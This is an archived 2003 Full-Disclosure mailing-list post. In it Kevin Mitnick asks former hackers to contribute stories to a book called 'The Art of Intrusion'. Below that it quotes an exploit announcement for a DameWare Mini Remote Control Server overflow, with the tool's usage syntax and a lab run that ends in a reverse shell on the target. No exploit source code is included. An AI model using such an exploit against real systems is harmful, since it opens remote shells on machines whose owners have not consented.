RE: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server Overflow Exploit

From: Kevin Mitnick (kmitnick_at_defthi.com)
Date: 12/20/03

  • Next message: Gregory A. Gilliss: "Re: [Full-Disclosure] 13 NASA Servers Hacked" 
    To: "'A***'" <netninja@hotmail.kg>, <full-disclosure@lists.netsys.com>, <bugtraq@securityfocus.com>
Date: Fri, 19 Dec 2003 15:30:35 -0800

    Hi all!

    I'm sorry for my absence from the list for the past few months, but I have
    been very busy traveling outside the US, and my mail account was
    experiencing problems. Now that I am receiving the messages again, I have
    been playing "catch up," by reading the old posts.

    I do have some good news, and was hoping that some of you might be able to
    assist me. I have been commissioned by Wiley & Sons to write a second book,
    which is tentatively titled, "The Art of Intrusion." This book will
    chronicle detailed accounts of real, untold hacks by the perpetrators who
    did it, and I will provide a security analysis and described how the attack
    could be mitigated/prevented in today's environment. I am going to tell the
    story from the perpetrator's stance, not just from research obtained from
    law enforcement officials and records.

    I am looking for former/retired hackers that would be willing to tell me the
    details of their sexiest hack. I am not interested in the run-of-the-mill
    attacks such as, exploiting RPC DCOM, but rather creative ones that
    incorporated technical, physical and/or social engineering aspects.

                     

    I am offering $500 for the most provocative story that makes it into the
    book, and if the person wishes, we can protect their anonymity by the use of
    a handle. All contributors selected for the book, will receive a copy of
    both books autographed by the authors.

    I should have more information up on FreeKevin.com today, as well as
    DefensiveThinking.com. If someone would like to contact me with a story or
    a possible lead on a storyteller, please write to me at
    hacks@defensivethinking.com, or call at (310)689-7229. I would appreciate
    any assistance you can offer.

    All my best,

     

    Kevin Mitnick

    -----Original Message-----
    From: full-disclosure-admin@lists.netsys.com
    [mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of A***
    Sent: Friday, December 19, 2003 8:38 AM
    To: full-disclosure@lists.netsys.com; bugtraq@securityfocus.com
    Subject: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server
    Overflow Exploit

    DameWare Mini Remote Control Server Exploit

    C:\xploits\dmware>dmware

            ...oO DameWare Remote Control Server Overflow Exploit Oo...

                    -( by A*** netmaniac[at]hotmail.KG )-

     - Versions vulnerable: <= DWRCS 3.72.0.0
     - Tested on: DWRCS ver: 3.72.0.0 Win2k SP3 & WinXP SP1

     Usage: dmware <TargetIP> <TargetPort> <YourIp> <YourPort>
     eg: dmware 10.0.0.1 6129 10.0.0.2 21

    C:\xploits\dmware>dmware 192.168.63.130 6129 192.168.63.1 53

            ...oO DameWare Remote Control Server Overflow Exploit Oo...

                    -( by A*** netmaniac[at]hotmail.KG )-

     - Versions vulnerable: <= DWRCS 3.72.0.0
     - Tested on: DWRCS ver: 3.72.0.0 Win2k SP3 & WinXP SP1

    [*] Target IP: 192.168.63.130 Port: 6129
    [*] Local IP: 192.168.63.1 Listening Port: 53

    [*] Initializing sockets... [ OK ]
    [*] Binding to local port: 53... [ OK ]
    [*] Setting up a listener... [ OK ]

     OS Info : WIN2000 [ver 5.0.2195]
     SP String : Service Pack 3

     EIP: 0x77db912b (advapi32.dll)

    [*] Constructing packet for WIN 2000 SP: 3... [ OK ]
    [*] Connecting to 192.168.63.130:6129... [ OK ]
    [*] Packet injected!
    [*] Connection request accepted: 192.168.63.130:1056
    [*] Dropping to shell...

    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    C:\WINNT\system32>exit
    exit
    [x] Connection closed.

    C:\xploits\dmware>

    ------
    cheerz,

    A***

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

  • Next message: Gregory A. Gilliss: "Re: [Full-Disclosure] 13 NASA Servers Hacked"